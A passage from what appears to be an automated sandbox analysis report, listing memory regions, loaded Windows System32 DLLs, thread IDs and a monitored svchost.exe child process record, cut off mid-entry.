"\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 771 start_va = 0x7ffb21330000 end_va = 0x7ffb2136dfff monitored = 0 entry_point = 0x7ffb2133a050 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 772 start_va = 0x7ffb21370000 end_va = 0x7ffb21396fff monitored = 0 entry_point = 0x7ffb21373bf0 region_type = mapped_file name = "profsvcext.dll" filename = "\\Windows\\System32\\profsvcext.dll" (normalized: "c:\\windows\\system32\\profsvcext.dll") Region: id = 773 start_va = 0x7ffb213a0000 end_va = 0x7ffb213f4fff monitored = 0 entry_point = 0x7ffb213afc00 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 774 start_va = 0x7ffb21400000 end_va = 0x7ffb21412fff monitored = 0 entry_point = 0x7ffb214057f0 region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 775 start_va = 0x7ffb21420000 end_va = 0x7ffb2142bfff monitored = 0 entry_point = 0x7ffb21422830 region_type = mapped_file name = "bi.dll" filename = "\\Windows\\System32\\bi.dll" (normalized: "c:\\windows\\system32\\bi.dll") Region: id = 776 start_va = 0x7ffb21430000 end_va = 0x7ffb21439fff monitored = 0 entry_point = 0x7ffb21431660 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 777 start_va = 0x7ffb21440000 end_va = 0x7ffb21457fff monitored = 0 entry_point = 0x7ffb21445910 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 778 start_va = 0x7ffb21460000 end_va = 0x7ffb215acfff monitored = 0 entry_point = 0x7ffb214a3da0 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 779 start_va = 0x7ffb21640000 end_va = 0x7ffb216d1fff monitored = 0 entry_point = 0x7ffb2168a780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 780 start_va = 0x7ffb21760000 end_va = 0x7ffb217d9fff monitored = 0 entry_point = 0x7ffb21787630 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 781 start_va = 0x7ffb217f0000 end_va = 0x7ffb217fafff monitored = 0 entry_point = 0x7ffb217f1de0 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 782 start_va = 0x7ffb218f0000 end_va = 0x7ffb21953fff monitored = 0 entry_point = 0x7ffb21905ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 783 start_va = 0x7ffb21b50000 end_va = 0x7ffb21b85fff monitored = 0 entry_point = 0x7ffb21b60070 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 784 start_va = 0x7ffb22640000 end_va = 0x7ffb22647fff monitored = 0 entry_point = 0x7ffb226413e0 region_type = mapped_file name = "dabapi.dll" filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll") Region: id = 785 start_va = 0x7ffb22ee0000 end_va = 0x7ffb22f58fff monitored = 0 entry_point = 0x7ffb22effb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 786 start_va = 0x7ffb23110000 end_va = 0x7ffb235a2fff monitored = 0 entry_point = 0x7ffb2311f760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 787 start_va = 0x7ffb235b0000 end_va = 0x7ffb23616fff monitored = 0 entry_point = 0x7ffb235ce710 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 788 start_va = 0x7ffb23670000 end_va = 0x7ffb237f5fff monitored = 0 entry_point = 0x7ffb236bd700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 789 start_va = 0x7ffb23800000 end_va = 0x7ffb2381bfff monitored = 0 entry_point = 0x7ffb238037a0 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 790 start_va = 0x7ffb23860000 end_va = 0x7ffb23872fff monitored = 0 entry_point = 0x7ffb23862760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 791 start_va = 0x7ffb239d0000 end_va = 0x7ffb23a0ffff monitored = 0 entry_point = 0x7ffb239e1960 region_type = mapped_file name = "brokerlib.dll" filename = "\\Windows\\System32\\BrokerLib.dll" (normalized: "c:\\windows\\system32\\brokerlib.dll") Region: id = 792 start_va = 0x7ffb23b60000 end_va = 0x7ffb23b86fff monitored = 0 entry_point = 0x7ffb23b67940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 793 start_va = 0x7ffb23b90000 end_va = 0x7ffb23c39fff monitored = 0 entry_point = 0x7ffb23bb7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 794 start_va = 0x7ffb23c40000 end_va = 0x7ffb23d3ffff monitored = 0 entry_point = 0x7ffb23c80f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 795 start_va = 0x7ffb23dd0000 end_va = 0x7ffb23ddbfff monitored = 0 entry_point = 0x7ffb23dd2480 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 796 start_va = 0x7ffb23ea0000 end_va = 0x7ffb23ed1fff monitored = 0 entry_point = 0x7ffb23eb2340 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 797 start_va = 0x7ffb24110000 end_va = 0x7ffb2411bfff monitored = 0 entry_point = 0x7ffb24112790 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 798 start_va = 0x7ffb24120000 end_va = 0x7ffb24143fff monitored = 0 entry_point = 0x7ffb24123260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 799 start_va = 0x7ffb242c0000 end_va = 0x7ffb243b3fff monitored = 0 entry_point = 0x7ffb242ca960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 800 start_va = 0x7ffb24410000 end_va = 0x7ffb24458fff monitored = 0 entry_point = 0x7ffb2441a090 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 801 start_va = 0x7ffb24530000 end_va = 0x7ffb2453bfff monitored = 0 entry_point = 0x7ffb245327e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 802 start_va = 0x7ffb24610000 end_va = 0x7ffb24640fff monitored = 0 entry_point = 0x7ffb24617d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 803 start_va = 0x7ffb24670000 end_va = 0x7ffb246e9fff monitored = 0 entry_point = 0x7ffb24691a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 804 start_va = 0x7ffb24730000 end_va = 0x7ffb24763fff monitored = 0 entry_point = 0x7ffb2474ae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 805 start_va = 0x7ffb24770000 end_va = 0x7ffb24779fff monitored = 0 entry_point = 0x7ffb24771830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 806 start_va = 0x7ffb24880000 end_va = 0x7ffb2489efff monitored = 0 entry_point = 0x7ffb24885d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 807 start_va = 0x7ffb249f0000 end_va = 0x7ffb24a4bfff monitored = 0 entry_point = 0x7ffb24a06f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 808 start_va = 0x7ffb24aa0000 end_va = 0x7ffb24ab6fff monitored = 0 entry_point = 0x7ffb24aa79d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 809 start_va = 0x7ffb24bc0000 end_va = 0x7ffb24bcafff monitored = 0 entry_point = 0x7ffb24bc19a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 810 start_va = 0x7ffb24c00000 end_va = 0x7ffb24c20fff monitored = 0 entry_point = 0x7ffb24c10250 region_type = mapped_file name = "joinutil.dll" filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll") Region: id = 811 start_va = 0x7ffb24c50000 end_va = 0x7ffb24c89fff monitored = 0 entry_point = 0x7ffb24c58d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 812 start_va = 0x7ffb24c90000 end_va = 0x7ffb24cb6fff monitored = 0 entry_point = 0x7ffb24ca0aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 813 start_va = 0x7ffb24da0000 end_va = 0x7ffb24dccfff monitored = 0 entry_point = 0x7ffb24db9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 814 start_va = 0x7ffb24f30000 end_va = 0x7ffb24f85fff monitored = 0 entry_point = 0x7ffb24f40bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 815 start_va = 0x7ffb24f90000 end_va = 0x7ffb24fa8fff monitored = 0 entry_point = 0x7ffb24f95e10 region_type = mapped_file name = "eventaggregation.dll" filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll") Region: id = 816 start_va = 0x7ffb24fb0000 end_va = 0x7ffb24fd8fff monitored = 0 entry_point = 0x7ffb24fc4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 817 start_va = 0x7ffb24fe0000 end_va = 0x7ffb25078fff monitored = 0 entry_point = 0x7ffb2500f4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 818 start_va = 0x7ffb25120000 end_va = 0x7ffb2512efff monitored = 0 entry_point = 0x7ffb25123210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 819 start_va = 0x7ffb25130000 end_va = 0x7ffb2517afff monitored = 0 entry_point = 0x7ffb251335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 820 start_va = 0x7ffb25180000 end_va = 0x7ffb25193fff monitored = 0 entry_point = 0x7ffb251852e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 821 start_va = 0x7ffb251a0000 end_va = 0x7ffb251affff monitored = 0 entry_point = 0x7ffb251a56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 822 start_va = 0x7ffb251b0000 end_va = 0x7ffb25397fff monitored = 0 entry_point = 0x7ffb251dba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 823 start_va = 0x7ffb253a0000 end_va = 0x7ffb253b6fff monitored = 0 entry_point = 0x7ffb253a1390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 824 start_va = 0x7ffb253c0000 end_va = 0x7ffb25586fff monitored = 0 entry_point = 0x7ffb2541db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 825 start_va = 0x7ffb25640000 end_va = 0x7ffb256a9fff monitored = 0 entry_point = 0x7ffb25676d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 826 start_va = 0x7ffb256b0000 end_va = 0x7ffb25764fff monitored = 0 entry_point = 0x7ffb256f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 827 start_va = 0x7ffb25770000 end_va = 0x7ffb257f5fff monitored = 0 entry_point = 0x7ffb2577d8f0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 828 start_va = 0x7ffb25800000 end_va = 0x7ffb25842fff monitored = 0 entry_point = 0x7ffb25814b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 829 start_va = 0x7ffb25850000 end_va = 0x7ffb25e93fff monitored = 0 entry_point = 0x7ffb25a164b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 830 start_va = 0x7ffb25ea0000 end_va = 0x7ffb25ef4fff monitored = 0 entry_point = 0x7ffb25eb7970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 831 start_va = 0x7ffb25f00000 end_va = 0x7ffb26085fff monitored = 0 entry_point = 0x7ffb25f4ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 832 start_va = 0x7ffb26090000 end_va = 0x7ffb261e5fff monitored = 0 entry_point = 0x7ffb2609a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 833 start_va = 0x7ffb26230000 end_va = 0x7ffb262dcfff monitored = 0 entry_point = 0x7ffb262481a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 834 start_va = 0x7ffb262e0000 end_va = 0x7ffb26331fff monitored = 0 entry_point = 0x7ffb262ef530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 835 start_va = 0x7ffb264f0000 end_va = 0x7ffb2658cfff monitored = 0 entry_point = 0x7ffb264f78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 836 start_va = 0x7ffb26590000 end_va = 0x7ffb266abfff monitored = 0 entry_point = 0x7ffb265d02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 837 start_va = 0x7ffb266b0000 end_va = 0x7ffb26756fff monitored = 0 entry_point = 0x7ffb266bb4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 838 start_va = 0x7ffb26780000 end_va = 0x7ffb267dbfff monitored = 0 entry_point = 0x7ffb2679b720 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 839 start_va = 0x7ffb267e0000 end_va = 0x7ffb27d3efff monitored = 0 entry_point = 0x7ffb269411f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 840 start_va = 0x7ffb27d40000 end_va = 0x7ffb27d9afff monitored = 0 entry_point = 0x7ffb27d538b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 841 start_va = 0x7ffb27e00000 end_va = 0x7ffb2807cfff monitored = 0 entry_point = 0x7ffb27ed4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 842 start_va = 0x7ffb281e0000 end_va = 0x7ffb28322fff monitored = 0 entry_point = 0x7ffb28208210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 843 start_va = 0x7ffb28450000 end_va = 0x7ffb284bafff monitored = 0 entry_point = 0x7ffb284690c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 844 start_va = 0x7ffb284c0000 end_va = 0x7ffb288e8fff monitored = 0 entry_point = 0x7ffb284e8740 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 845 start_va = 0x7ffb288f0000 end_va = 0x7ffb289b0fff monitored = 0 entry_point = 0x7ffb28910da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 846 start_va = 0x7ffb28a40000 end_va = 0x7ffb28a47fff monitored = 0 entry_point = 0x7ffb28a41ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 847 start_va = 0x7ffb28a50000 end_va = 0x7ffb28af6fff monitored = 0 entry_point = 0x7ffb28a658d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 848 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2040 start_va = 0x6ff0000 end_va = 0x70effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006ff0000" filename = "" Region: id = 2041 start_va = 0x7800000 end_va = 0x78fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007800000" filename = "" Region: id = 2042 start_va = 0x7d00000 end_va = 0x7dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007d00000" filename = "" Region: id = 2043 start_va = 0x1750000 end_va = 0x17cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001750000" filename = "" Region: id = 2044 start_va = 0x3000000 end_va = 0x307ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 2045 start_va = 0x7ffb23010000 end_va = 0x7ffb23060fff monitored = 0 entry_point = 0x7ffb230125e0 region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll") Thread: id = 12 os_tid = 0x13e8 Thread: id = 13 os_tid = 0x1378 Thread: id = 14 os_tid = 0x1d4 Thread: id = 15 os_tid = 0xfa8 Thread: id = 16 os_tid = 0x12bc Thread: id = 17 os_tid = 0x129c Thread: id = 18 os_tid = 0x1e4 Thread: id = 19 os_tid = 0xd24 Thread: id = 20 os_tid = 0x370 Thread: id = 21 os_tid = 0x89c Thread: id = 22 os_tid = 0xabc Thread: id = 23 os_tid = 0x464 Thread: id = 24 os_tid = 0x3e8 Thread: id = 25 os_tid = 0x460 Thread: id = 26 os_tid = 0x3ac Thread: id = 27 os_tid = 0xcd4 Thread: id = 28 os_tid = 0xcd0 Thread: id = 29 os_tid = 0x55c Thread: id = 30 os_tid = 0xbc8 Thread: id = 31 os_tid = 0x5bc Thread: id = 32 os_tid = 0xa88 Thread: id = 33 os_tid = 0xa90 Thread: id = 34 os_tid = 0x59c Thread: id = 35 os_tid = 0xc68 Thread: id = 36 os_tid = 0x4fc Thread: id = 37 os_tid = 0xd94 Thread: id = 38 os_tid = 0xf7c Thread: id = 39 os_tid = 0xf74 Thread: id = 40 os_tid = 0xf68 Thread: id = 41 os_tid = 0xf60 Thread: id = 42 os_tid = 0xf5c Thread: id = 43 os_tid = 0xf58 Thread: id = 44 os_tid = 0xf54 Thread: id = 45 os_tid = 0xf40 Thread: id = 46 os_tid = 0xf38 Thread: id = 47 os_tid = 0xf20 Thread: id = 48 os_tid = 0xf10 Thread: id = 49 os_tid = 0xe58 Thread: id = 50 os_tid = 0xe54 Thread: id = 51 os_tid = 0xe4c Thread: id = 52 os_tid = 0xe04 Thread: id = 53 os_tid = 0xb04 Thread: id = 54 os_tid = 0xac4 Thread: id = 55 os_tid = 0xb48 Thread: id = 56 os_tid = 0xaec Thread: id = 57 os_tid = 0xae4 Thread: id = 58 os_tid = 0xaa8 Thread: id = 59 os_tid = 0xa40 Thread: id = 60 os_tid = 0xa28 Thread: id = 61 os_tid = 0xa0c Thread: id = 62 os_tid = 0xa08 Thread: id = 63 os_tid = 0x9f4 Thread: id = 64 os_tid = 0x9ec Thread: id = 65 os_tid = 0x9e4 Thread: id = 66 os_tid = 0x9e0 Thread: id = 67 os_tid = 0x9d4 Thread: id = 68 os_tid = 0x9c8 Thread: id = 69 os_tid = 0x950 Thread: id = 70 os_tid = 0x93c Thread: id = 71 os_tid = 0x91c Thread: id = 72 os_tid = 0x830 Thread: id = 73 os_tid = 0x4e0 Thread: id = 74 os_tid = 0x520 Thread: id = 75 os_tid = 0x48c Thread: id = 76 os_tid = 0x630 Thread: id = 77 os_tid = 0x4a8 Thread: id = 78 os_tid = 0x49c Thread: id = 79 os_tid = 0x44c Thread: id = 80 os_tid = 0x408 Thread: id = 81 os_tid = 0x404 Thread: id = 82 os_tid = 0x2b0 Thread: id = 83 os_tid = 0x294 Thread: id = 84 os_tid = 0x168 Thread: id = 85 os_tid = 0x170 Thread: id = 86 os_tid = 0x288 Thread: id = 87 os_tid = 0x284 Thread: id = 88 os_tid = 0x264 Thread: id = 89 os_tid = 0x274 Thread: id = 90 os_tid = 0x15c Thread: id = 91 os_tid = 0xf4 Thread: id = 144 os_tid = 0x978 Thread: id = 145 os_tid = 0x8a4 Thread: id = 146 os_tid = 0xe44 Thread: id = 147 os_tid = 0xfd4 Thread: id = 148 os_tid = 0x1378 Process: id = "5" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x4e41000" os_pid = "0x148" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x750" cmd_line = "C:\\Windows\\system32\\svchost.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 853 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 854 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 855 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 856 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 857 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 858 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 859 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 860 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 861 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 862 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 863 start_va = 0x7ff6bac60000 end_va = 0x7ff6bac6cfff monitored = 0 entry_point = 0x7ff6bac63980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 864 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 865 start_va = 0x100000 end_va = 0x100fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 866 start_va = 0x110000 end_va = 0x110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 867 start_va = 0x5f0000 end_va = 0x5f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 868 start_va = 0x600000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 869 start_va = 0x7ffb251b0000 end_va = 0x7ffb25397fff monitored = 0 entry_point = 0x7ffb251dba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 870 start_va = 0x7ffb26230000 end_va = 0x7ffb262dcfff monitored = 0 entry_point = 0x7ffb262481a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 871 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 872 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 873 start_va = 0x120000 end_va = 0x1ddfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = 